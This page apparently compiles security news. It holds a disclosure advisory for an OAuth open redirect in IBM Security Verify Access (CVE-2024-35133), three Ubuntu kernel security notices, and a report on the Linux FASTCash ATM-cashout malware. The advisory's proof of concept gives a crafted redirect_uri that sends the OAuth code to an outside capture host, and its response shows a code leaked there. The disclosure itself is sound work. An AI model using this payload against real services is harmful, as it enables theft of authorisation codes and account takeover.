IBM Security Verify Access versions 10.0.0 through 10.0.8 suffer from an OAUTH related open redirection vulnerability.

- IBM Security Verify Access >= 10.0.0 <= 10.0.8 - Open Redirect during  
OAuth Flow

======== < Table of Contents >  
================================================

  0. Overview  
  1. Detailed Description  
  2. Proof Of Concept  
  3. Solution  
  4. Disclosure Timeline  
  5. References  
  6. Credits  
  7. Legal Notices

======== < 0. Overview >  
======================================================

  Revision:  
    1.0

  Impact:  
    By persuading a victim to visit a specially crafted Web site, a remote  
    attacker could exploit this vulnerability to spoof the URL displayed  
    to redirect a user to a malicious Web site that would appear to be  
    trusted. This could allow the attacker to obtain highly sensitive  
    information or conduct further attacks against the victim.

  Severity:  
    NIST: High  
    IBM: Medium

  CVSS Score:  
    NIST 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)  
    IBM 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)

  CVE-ID:  
    CVE-2024-35133

  Vendor:  
    IBM

  Affected Products:  
    IBM Security Verify Access  
    IBM Security Verify Access Docker

  Affected Versions:  
    10.0.0 - 10.0.8

  Product Description:

    IBM Security Verify Access is a complete authorization and network  
    security policy management solution. It provides end-to-end protection  
    of resources over geographically dispersed intranets and extranets.

    In addition to state-of-the-art security policy management, IBM Security  
    Verify Access provides authentication, authorization, data security, and  
    centralized resource management capabilities.

    IBM Security Verify Access offers the following features:  
    Authentication ~ Provides a wide range of built-in authenticators and  
    supports external authenticators.

    Authorization ~ Provides permit and deny decisions for protected  
resources  
    requests in the secure domain through the authorization API.

    Data security and centralized resource management ~ Manages secure  
access  
    to private internal network-based resources by using the public  
Internet's  
    broad connectivity and ease of use with a corporate firewall system.

======== < 1. Detailed Description >  
==========================================

  During a Penetration Test of the OAuth flow for a client, it was found an  
  Open Redirect vulnerability that can led to the leakage of the OAuth  
"code" variable.

  It was possible to bypass the parser's logic responsible for verifying the  
  correctness and the validity of the "redirect_uri" parameter during an  
OAuth  
  flow by leveraging RFC 3986 (3.2.1) providing a username and password  
directly  
  in the Uniform Resource Identifier (URI).

  By providing as the "username" field a legitimate and expected domain, it  
  was possible to bypass the whitelist filter used by "IBM Security Verify  
Access"  
  and cause an Open Redirect to any arbitrary domain controlled by the  
attacker,  
  not only altering the expected flow and redirect a user to a malicious  
  Web site that would appear to be trusted.

  This could allow the attacker to obtain highly sensitive like the OAuth  
"code"  
  token or conduct further attacks against the victim

======== < 2. Proof of Concepts >  
=============================================

===== REQUEST =====

[[  
  GET  
/oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=  
https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+  
HTTP/1.1  
  Host: [REDACTED]  
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101  
Firefox/115.0  
  Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
  Accept-Language: en-US,en;q=0.5  
  Accept-Encoding: gzip, deflate, br  
  Upgrade-Insecure-Requests: 1  
  Sec-Fetch-Dest: document  
  Sec-Fetch-Mode: navigate  
  Sec-Fetch-Site: same-origin  
  Sec-Fetch-User: ?1  
  Te: trailers  
  Connection: close  
]]

===== RESPONSE =====

[[  
  HTTP/1.1 302 Found  
  content-language: en-US  
  date: Tue, 19 Mar 2024 16:04:35 GMT  
  location:  
https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]  
  p3p: CP="NON CUR OTPi OUR NOR UNI"  
  x-frame-options: DENY  
  x-content-type-options: nosniff  
  cache-control: no-store  
  x-xss-protection: 1; mode=block  
  x-permitted-cross-domain-policies: none  
  cross-origin-resource-policy: same-site  
  content-security-policy: frame-ancestors 'none'  
  referrer-policy: no-referrer-when-downgrade  
  strict-transport-security: max-age=31536000; includeSubDomains  
  pragma: no-cache  
  Content-Length: 0.  
]]

======== < 3. Solution >  
======================================================

  Refer to IBM Security Bulletin 7166712 for patch, upgrade or  
  suggested workaround information.

  See "References" for more details.

======== < 4. Disclosure Timeline >  
===========================================

  19/03/2024 - Vulnerability discovered by the Security Researcher (Giulio  
Garzia)  
  21/03/2024 - Vulnerability shared with the client who committed the  
Penetration Test on his infrastructure, relying on IBM SVA  
  02/04/2024 - Vulnerability shared with IBM  
  02/04/2024 - Vulnerability taken over by IBM  
  14/05/2024 - Vulnerability confirmed by IBM  
  18/07/2024 - Pre-release provided by IBM to the customer to verify the  
resolution of the vulnerability  
  27/08/2024 - Security Bulletin and vulnerability shared by IBM

======== < 5. References >  
====================================================

  (1)  
https://www.ibm.com/support/pages/security-bulletin-security-vulnerability-was-fixed-ibm-security-verify-access-cve-2024-35133  
  (2) https://exchange.xforce.ibmcloud.com/vulnerabilities/291026  
  (3) https://nvd.nist.gov/vuln/detail/CVE-2024-35133  
  (4) https://cwe.mitre.org/data/definitions/178.html

======== < 6. Credits >  
=======================================================

  This vulnerability was discovered and reported by:

    Giulio Garzia 'Ozozuz'

  Contacts:

    https://www.linkedin.com/in/giuliogarzia/  
    https://github.com/Ozozuz

======== < 7. Legal Notices >  
================================================

  Copyright (c) 2024 Giulio Garzia "Ozozuz"

  Permission is granted for the redistribution of this alert  
  electronically. It may not be edited in any way without mine express  
  written consent. If you wish to reprint the whole or any  
  part of this alert in any other medium other than electronically,  
  please email me for permission.

  Disclaimer: The information in the advisory is believed to be accurate  
  at the time of publishing based on currently available information.  
  Use of the information constitutes acceptance for use in an AS IS  
  condition.  
  There are no warranties with regard to this information. Neither the  
  author nor the publisher accepts any liability for any direct,  
  indirect, or consequential loss or damage arising from use of,  
  or reliance on,this information.

IBM Security Verify Access 10.0.8 Open Redirection

Ubuntu Security Notice 7073-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7073-1October 16, 2024linux, linux-aws, linux-aws-5.4, linux-bluefield, linux-gcp,linux-gcp-5.4, linux-gkeop, linux-hwe-5.4, linux-ibm, linux-ibm-5.4,linux-kvm, linux-oracle, linux-oracle-5.4, linux-raspi, linux-raspi-5.4,linux-xilinx-zynqmp vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-bluefield: Linux kernel for NVIDIA BlueField platforms- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-xilinx-zynqmp: Linux kernel for Xilinx ZynqMP processors- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-ibm-5.4: Linux kernel for IBM cloud systems- linux-oracle-5.4: Linux kernel for Oracle Cloud systems- linux-raspi-5.4: Linux kernel for Raspberry Pi systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - Watchdog drivers;  - Netfilter;  - Memory management;  - Network traffic control;(CVE-2024-27397, CVE-2024-38630, CVE-2024-45016, CVE-2024-26960)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.4.0-1053-xilinx-zynqmp  5.4.0-1053.57  linux-image-5.4.0-1081-ibm      5.4.0-1081.86  linux-image-5.4.0-1094-bluefield  5.4.0-1094.101  linux-image-5.4.0-1101-gkeop    5.4.0-1101.105  linux-image-5.4.0-1118-raspi    5.4.0-1118.130  linux-image-5.4.0-1122-kvm      5.4.0-1122.130  linux-image-5.4.0-1133-oracle   5.4.0-1133.142  linux-image-5.4.0-1134-aws      5.4.0-1134.144  linux-image-5.4.0-1138-gcp      5.4.0-1138.147  linux-image-5.4.0-198-generic   5.4.0-198.218  linux-image-5.4.0-198-generic-lpae  5.4.0-198.218  linux-image-5.4.0-198-lowlatency  5.4.0-198.218  linux-image-aws-lts-20.04       5.4.0.1134.131  linux-image-bluefield           5.4.0.1094.90  linux-image-gcp-lts-20.04       5.4.0.1138.140  linux-image-generic             5.4.0.198.196  linux-image-generic-lpae        5.4.0.198.196  linux-image-gkeop               5.4.0.1101.99  linux-image-gkeop-5.4           5.4.0.1101.99  linux-image-ibm-lts-20.04       5.4.0.1081.110  linux-image-kvm                 5.4.0.1122.118  linux-image-lowlatency          5.4.0.198.196  linux-image-oem                 5.4.0.198.196  linux-image-oem-osp1            5.4.0.198.196  linux-image-oracle-lts-20.04    5.4.0.1133.126  linux-image-raspi               5.4.0.1118.148  linux-image-raspi2              5.4.0.1118.148  linux-image-virtual             5.4.0.198.196  linux-image-xilinx-zynqmp       5.4.0.1053.53Ubuntu 18.04 LTS  linux-image-5.4.0-1081-ibm      5.4.0-1081.86~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-1118-raspi    5.4.0-1118.130~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-1133-oracle   5.4.0-1133.142~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-1134-aws      5.4.0-1134.144~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-1138-gcp      5.4.0-1138.147~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-198-generic   5.4.0-198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-198-lowlatency  5.4.0-198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-aws                 5.4.0.1134.144~18.04.1                                  Available with Ubuntu Pro  linux-image-gcp                 5.4.0.1138.147~18.04.1                                  Available with Ubuntu Pro  linux-image-generic-hwe-18.04   5.4.0.198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-ibm                 5.4.0.1081.86~18.04.1                                  Available with Ubuntu Pro  linux-image-lowlatency-hwe-18.04  5.4.0.198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-oem                 5.4.0.198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-oem-osp1            5.4.0.198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-oracle              5.4.0.1133.142~18.04.1                                  Available with Ubuntu Pro  linux-image-raspi-hwe-18.04     5.4.0.1118.130~18.04.1                                  Available with Ubuntu Pro  linux-image-snapdragon-hwe-18.04  5.4.0.198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-virtual-hwe-18.04   5.4.0.198.218~18.04.1                                  Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7073-1  CVE-2024-26960, CVE-2024-27397, CVE-2024-38630, CVE-2024-45016Package Information:  https://launchpad.net/ubuntu/+source/linux/5.4.0-198.218  https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1134.144  https://launchpad.net/ubuntu/+source/linux-bluefield/5.4.0-1094.101  https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1138.147  https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1101.105  https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1081.86  https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1122.130  https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1133.142  https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1118.130  https://launchpad.net/ubuntu/+source/linux-xilinx-zynqmp/5.4.0-1053.57

Ubuntu Security Notice USN-7073-1

Ubuntu Security Notice 7072-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7072-1October 16, 2024linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gkeop,linux-gkeop-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15,linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm, linux-lowlatency,linux-lowlatency-hwe-5.15, linux-nvidia, linux-oracle, linux-oracle-5.15,linux-raspi, linux-xilinx-zynqmp vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-intel-iotg: Linux kernel for Intel IoT platforms- linux-kvm: Linux kernel for cloud environments- linux-lowlatency: Linux low latency kernel- linux-nvidia: Linux kernel for NVIDIA systems- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-xilinx-zynqmp: Linux kernel for Xilinx ZynqMP processors- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-hwe-5.15: Linux hardware enablement (HWE) kernel- linux-ibm-5.15: Linux kernel for IBM cloud systems- linux-intel-iotg-5.15: Linux kernel for Intel IoT platforms- linux-lowlatency-hwe-5.15: Linux low latency kernel- linux-oracle-5.15: Linux kernel for Oracle Cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - Watchdog drivers;  - Netfilter;  - Network traffic control;(CVE-2024-38630, CVE-2024-27397, CVE-2024-45016)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  linux-image-5.15.0-1037-xilinx-zynqmp  5.15.0-1037.41  linux-image-5.15.0-1054-gkeop   5.15.0-1054.61  linux-image-5.15.0-1064-ibm     5.15.0-1064.67  linux-image-5.15.0-1064-raspi   5.15.0-1064.67  linux-image-5.15.0-1066-intel-iotg  5.15.0-1066.72  linux-image-5.15.0-1066-nvidia  5.15.0-1066.67  linux-image-5.15.0-1066-nvidia-lowlatency  5.15.0-1066.67  linux-image-5.15.0-1068-kvm     5.15.0-1068.73  linux-image-5.15.0-1069-oracle  5.15.0-1069.75  linux-image-5.15.0-1070-gcp     5.15.0-1070.78  linux-image-5.15.0-1071-aws     5.15.0-1071.77  linux-image-5.15.0-124-generic  5.15.0-124.134  linux-image-5.15.0-124-generic-64k  5.15.0-124.134  linux-image-5.15.0-124-generic-lpae  5.15.0-124.134  linux-image-5.15.0-124-lowlatency  5.15.0-124.134  linux-image-5.15.0-124-lowlatency-64k  5.15.0-124.134  linux-image-aws-lts-22.04       5.15.0.1071.71  linux-image-gcp-lts-22.04       5.15.0.1070.66  linux-image-generic             5.15.0.124.124  linux-image-generic-64k         5.15.0.124.124  linux-image-generic-lpae        5.15.0.124.124  linux-image-gkeop               5.15.0.1054.53  linux-image-gkeop-5.15          5.15.0.1054.53  linux-image-ibm                 5.15.0.1064.60  linux-image-intel-iotg          5.15.0.1066.66  linux-image-kvm                 5.15.0.1068.64  linux-image-lowlatency          5.15.0.124.112  linux-image-lowlatency-64k      5.15.0.124.112  linux-image-nvidia              5.15.0.1066.66  linux-image-nvidia-lowlatency   5.15.0.1066.66  linux-image-oracle-lts-22.04    5.15.0.1069.65  linux-image-raspi               5.15.0.1064.62  linux-image-raspi-nolpae        5.15.0.1064.62  linux-image-virtual             5.15.0.124.124  linux-image-xilinx-zynqmp       5.15.0.1037.41Ubuntu 20.04 LTS  linux-image-5.15.0-1054-gkeop   5.15.0-1054.61~20.04.1  linux-image-5.15.0-1064-ibm     5.15.0-1064.67~20.04.1  linux-image-5.15.0-1066-intel-iotg  5.15.0-1066.72~20.04.1  linux-image-5.15.0-1069-oracle  5.15.0-1069.75~20.04.1  linux-image-5.15.0-1070-gcp     5.15.0-1070.78~20.04.1  linux-image-5.15.0-1071-aws     5.15.0-1071.77~20.04.1  linux-image-5.15.0-124-generic  5.15.0-124.134~20.04.1  linux-image-5.15.0-124-generic-64k  5.15.0-124.134~20.04.1  linux-image-5.15.0-124-generic-lpae  5.15.0-124.134~20.04.1  linux-image-5.15.0-124-lowlatency  5.15.0-124.134~20.04.1  linux-image-5.15.0-124-lowlatency-64k  5.15.0-124.134~20.04.1  linux-image-aws                 5.15.0.1071.77~20.04.1  linux-image-gcp                 5.15.0.1070.78~20.04.1  linux-image-generic-64k-hwe-20.04  5.15.0.124.134~20.04.1  linux-image-generic-hwe-20.04   5.15.0.124.134~20.04.1  linux-image-generic-lpae-hwe-20.04  5.15.0.124.134~20.04.1  linux-image-gkeop-5.15          5.15.0.1054.61~20.04.1  linux-image-ibm                 5.15.0.1064.67~20.04.1  linux-image-intel               5.15.0.1066.72~20.04.1  linux-image-intel-iotg          5.15.0.1066.72~20.04.1  linux-image-lowlatency-64k-hwe-20.04  5.15.0.124.134~20.04.1  linux-image-lowlatency-hwe-20.04  5.15.0.124.134~20.04.1  linux-image-oem-20.04           5.15.0.124.134~20.04.1  linux-image-oem-20.04b          5.15.0.124.134~20.04.1  linux-image-oem-20.04c          5.15.0.124.134~20.04.1  linux-image-oem-20.04d          5.15.0.124.134~20.04.1  linux-image-oracle              5.15.0.1069.75~20.04.1  linux-image-virtual-hwe-20.04   5.15.0.124.134~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7072-1  CVE-2024-27397, CVE-2024-38630, CVE-2024-45016Package Information:  https://launchpad.net/ubuntu/+source/linux/5.15.0-124.134  https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1071.77  https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1070.78  https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1054.61  https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1064.67  https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1066.72  https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1068.73  https://launchpad.net/ubuntu/+source/linux-lowlatency/5.15.0-124.134  https://launchpad.net/ubuntu/+source/linux-nvidia/5.15.0-1066.67  https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1069.75  https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1064.67  https://launchpad.net/ubuntu/+source/linux-xilinx-zynqmp/5.15.0-1037.41  https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1071.77~20.04.1  https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1070.78~20.04.1  https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1054.61~20.04.1  https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-124.134~20.04.1  https://launchpad.net/ubuntu/+source/linux-ibm-5.15/5.15.0-1064.67~20.04.1 https://launchpad.net/ubuntu/+source/linux-intel-iotg-5.15/5.15.0-1066.72~20.04.1 https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-124.134~20.04.1 https://launchpad.net/ubuntu/+source/linux-oracle-5.15/5.15.0-1069.75~20.04.1

Ubuntu Security Notice USN-7072-1

Ubuntu Security Notice 7071-1 - A security issue was discovered in the Linux kernel. An attacker could possibly use this to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7071-1October 16, 2024linux, linux-aws, linux-aws-6.8, linux-gcp, linux-gcp-6.8, linux-hwe-6.8,linux-ibm, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-nvidia,linux-nvidia-6.8, linux-nvidia-lowlatency, linux-oem-6.8, linux-oracle,linux-oracle-6.8, linux-raspi vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTSSummary:The system could be compromised under certain conditions.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-lowlatency: Linux low latency kernel- linux-nvidia: Linux kernel for NVIDIA systems- linux-nvidia-lowlatency: Linux low latency kernel for NVIDIA systems- linux-oem-6.8: Linux kernel for OEM systems- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-aws-6.8: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp-6.8: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-6.8: Linux hardware enablement (HWE) kernel- linux-lowlatency-hwe-6.8: Linux low latency kernel- linux-nvidia-6.8: Linux kernel for NVIDIA systems- linux-oracle-6.8: Linux kernel for Oracle Cloud systemsDetails:A security issue was discovered in the Linux kernel.An attacker could possibly use this to compromise the system.This update corrects flaws in the following subsystems:  - Network traffic control;(CVE-2024-45016)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  linux-image-6.8.0-1013-raspi    6.8.0-1013.14  linux-image-6.8.0-1014-ibm      6.8.0-1014.14  linux-image-6.8.0-1014-oem      6.8.0-1014.14  linux-image-6.8.0-1014-oracle   6.8.0-1014.14  linux-image-6.8.0-1014-oracle-64k  6.8.0-1014.14  linux-image-6.8.0-1015-nvidia   6.8.0-1015.16  linux-image-6.8.0-1015-nvidia-64k  6.8.0-1015.16  linux-image-6.8.0-1015-nvidia-lowlatency  6.8.0-1015.16.1  linux-image-6.8.0-1015-nvidia-lowlatency-64k  6.8.0-1015.16.1  linux-image-6.8.0-1016-gcp      6.8.0-1016.18  linux-image-6.8.0-1017-aws      6.8.0-1017.18  linux-image-6.8.0-47-generic    6.8.0-47.47  linux-image-6.8.0-47-generic-64k  6.8.0-47.47  linux-image-6.8.0-47-lowlatency  6.8.0-47.47.1  linux-image-6.8.0-47-lowlatency-64k  6.8.0-47.47.1  linux-image-aws                 6.8.0-1017.18  linux-image-gcp                 6.8.0-1016.18  linux-image-generic             6.8.0-47.47  linux-image-generic-64k         6.8.0-47.47  linux-image-generic-64k-hwe-24.04  6.8.0-47.47  linux-image-generic-hwe-24.04   6.8.0-47.47  linux-image-generic-lpae        6.8.0-47.47  linux-image-ibm                 6.8.0-1014.14  linux-image-ibm-classic         6.8.0-1014.14  linux-image-ibm-lts-24.04       6.8.0-1014.14  linux-image-kvm                 6.8.0-47.47  linux-image-lowlatency          6.8.0-47.47.1  linux-image-lowlatency-64k      6.8.0-47.47.1  linux-image-nvidia              6.8.0-1015.16  linux-image-nvidia-64k          6.8.0-1015.16  linux-image-nvidia-lowlatency   6.8.0-1015.16.1  linux-image-nvidia-lowlatency-64k  6.8.0-1015.16.1  linux-image-oem-24.04           6.8.0-1014.14  linux-image-oem-24.04a          6.8.0-1014.14  linux-image-oracle              6.8.0-1014.14  linux-image-oracle-64k          6.8.0-1014.14  linux-image-raspi               6.8.0-1013.14  linux-image-virtual             6.8.0-47.47  linux-image-virtual-hwe-24.04   6.8.0-47.47Ubuntu 22.04 LTS  linux-image-6.8.0-1014-oracle   6.8.0-1014.14~22.04.1  linux-image-6.8.0-1014-oracle-64k  6.8.0-1014.14~22.04.1  linux-image-6.8.0-1015-nvidia   6.8.0-1015.16~22.04.1  linux-image-6.8.0-1015-nvidia-64k  6.8.0-1015.16~22.04.1  linux-image-6.8.0-1016-gcp      6.8.0-1016.18~22.04.1  linux-image-6.8.0-1017-aws      6.8.0-1017.18~22.04.1  linux-image-6.8.0-47-generic    6.8.0-47.47~22.04.1  linux-image-6.8.0-47-generic-64k  6.8.0-47.47~22.04.1  linux-image-6.8.0-47-lowlatency  6.8.0-47.47.1~22.04.1  linux-image-6.8.0-47-lowlatency-64k  6.8.0-47.47.1~22.04.1  linux-image-aws                 6.8.0-1017.18~22.04.1  linux-image-gcp                 6.8.0-1016.18~22.04.1  linux-image-generic-64k-hwe-22.04  6.8.0-47.47~22.04.1  linux-image-generic-hwe-22.04   6.8.0-47.47~22.04.1  linux-image-lowlatency-64k-hwe-22.04  6.8.0-47.47.1~22.04.1  linux-image-lowlatency-hwe-22.04  6.8.0-47.47.1~22.04.1  linux-image-nvidia-6.8          6.8.0-1015.16~22.04.1  linux-image-nvidia-64k-6.8      6.8.0-1015.16~22.04.1  linux-image-oem-22.04           6.8.0-47.47~22.04.1  linux-image-oem-22.04a          6.8.0-47.47~22.04.1  linux-image-oem-22.04b          6.8.0-47.47~22.04.1  linux-image-oem-22.04c          6.8.0-47.47~22.04.1  linux-image-oem-22.04d          6.8.0-47.47~22.04.1  linux-image-oracle              6.8.0-1014.14~22.04.1  linux-image-oracle-64k          6.8.0-1014.14~22.04.1  linux-image-virtual-hwe-22.04   6.8.0-47.47~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7071-1  CVE-2024-45016Package Information:  https://launchpad.net/ubuntu/+source/linux/6.8.0-47.47  https://launchpad.net/ubuntu/+source/linux-aws/6.8.0-1017.18  https://launchpad.net/ubuntu/+source/linux-gcp/6.8.0-1016.18  https://launchpad.net/ubuntu/+source/linux-ibm/6.8.0-1014.14  https://launchpad.net/ubuntu/+source/linux-lowlatency/6.8.0-47.47.1  https://launchpad.net/ubuntu/+source/linux-nvidia/6.8.0-1015.16  https://launchpad.net/ubuntu/+source/linux-nvidia-lowlatency/6.8.0-1015.16.1  https://launchpad.net/ubuntu/+source/linux-oem-6.8/6.8.0-1014.14  https://launchpad.net/ubuntu/+source/linux-oracle/6.8.0-1014.14  https://launchpad.net/ubuntu/+source/linux-raspi/6.8.0-1013.14  https://launchpad.net/ubuntu/+source/linux-aws-6.8/6.8.0-1017.18~22.04.1  https://launchpad.net/ubuntu/+source/linux-gcp-6.8/6.8.0-1016.18~22.04.1  https://launchpad.net/ubuntu/+source/linux-hwe-6.8/6.8.0-47.47~22.04.1 https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-6.8/6.8.0-47.47.1~22.04.1  https://launchpad.net/ubuntu/+source/linux-nvidia-6.8/6.8.0-1015.16~22.04.1  https://launchpad.net/ubuntu/+source/linux-oracle-6.8/6.8.0-1014.14~22.04.1

Ubuntu Security Notice USN-7071-1

North Korean hackers target Linux-based payment switches with new FASTCash malware, enabling ATM cashouts. Secure your financial infrastructure…

North Korean hackers target Linux-based payment switches with new FASTCash malware, enabling ATM cashouts. Secure your financial infrastructure and protect against these sophisticated attacks with expert cybersecurity solutions.

A new variant of the FASTCash malware, previously known to target Windows and AIX systems, has now been identified targeting Linux-based payment switches. 

FASTCash, first documented by U.S. CISA in 2018, has been linked to a series of ATM cashout schemes targeting banks in Africa and Asia since at least 2016, and has been developed by the notorious North Korean state-backed hacking group known as Lazarus (aka Hidden Cobra).

The malware operates by compromising payment switch servers, which are crucial components of a bank’s infrastructure responsible for processing card transactions. These systems handle the flow of transaction data between acquirers (the banks that enable merchants to accept payments), issuers (the banks that provide cards), and card networks like Visa and Mastercard. By targeting these payment switch servers, the malware disrupts the entire transaction process, making financial institutions vulnerable to fraud.

FASTCash for Linux uses Ubuntu Linux 22.04 (Focal Fossa), C++ programming language, AES-128 CBC encryption, and a hardcoded key to protect the configuration file.

A researcher, using the handle HaxRob, discovered two new samples of FASTCash for Linux switches in June 2023, one compiled for Ubuntu Linux 20.04 and likely developed after April 21, 2022, and the other likely not used. As of Sunday, only four anti-malware engines detected each sample.

HaxRob explains that the malware is present in the userspace of an interbank switch. When a compromised card is used for fraudulent translation, FASTCash manipulates messages received from issuers, causing transaction messages for denies to be converted to approvals.

The Linux variant of FASTCash is disguised as a shared object file named “libMyFc.so.” It specifically targets ISO 8583 messages – the standard format for communication within payment networks, intercepting declined transaction messages, typically triggered by insufficient funds, for a predetermined list of cardholder accounts. 

It then manipulates these messages, authorizing them for a random withdrawal amount in Turkish Lira, ranging from 12,000 to 30,000 Lira ($350 to $875). This modus operandi mirrors a Windows variant of FASTCash identified by the Cybersecurity and Infrastructure Security Agency (CISA) in September 2020.

For targeted transactions, the malware modifies the authorization response message by:

*   Removing specific data elements to avoid detection.
*   Overwriting the processing code to indicate approval.
*   Adding a random amount of Turkish Lira to the transaction amount.

Attack flow (Screenshot credit: Doubleagent.net

This expansion highlights the increasing sophistication and persistence of North Korean cyberattacks aimed at financial institutions and the need for enhanced security measures in payment switch systems.

Organizations should implement robust detection capabilities, regularly update software, configure security controls, patch and update systems, implement strong network security, conduct regular audits, and educate staff on phishing and social engineering risks to stay protected.

1.  **ATMJackpot Malware Stealing Cash From ATMs**
